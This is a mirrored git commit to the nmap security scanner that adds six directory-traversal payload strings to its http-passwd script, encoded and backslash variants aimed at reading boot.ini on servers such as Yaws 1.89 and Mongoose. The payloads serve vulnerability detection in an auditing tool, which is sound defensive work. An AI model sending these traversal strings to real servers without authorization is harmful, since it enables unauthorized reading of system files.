mirror of
https://github.com/nmap/nmap.git
synced 2026-08-03 22:29:06 +00:00
Add more http-passwd payloads from Ange Gutek.
This commit is contained in:
parent
908c222b82
commit
fb0aa3f1e3
1 changed files with 6 additions and 0 deletions
|
|
@ -144,6 +144,12 @@ action = function(host, port)
|
|||
--Mongoose Web Server
|
||||
'///..%2f..%2f..%2f..%2fboot.ini',
|
||||
'/..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini',
|
||||
'/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\boot.ini',
|
||||
-- Yaws 1.89
|
||||
'/..\\/..\\/..\\/boot.ini',
|
||||
'/..\\/\\..\\/\\..\\/\\boot.ini',
|
||||
'/\\../\\../\\../boot.ini',
|
||||
'////..\\..\\..\\boot.ini',
|
||||
--MultiThreaded HTTP Server v1.1
|
||||
'/..\\..\\..\\..\\\\..\\..\\\\..\\..\\\\\\boot.ini',
|
||||
--uHttp Server
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue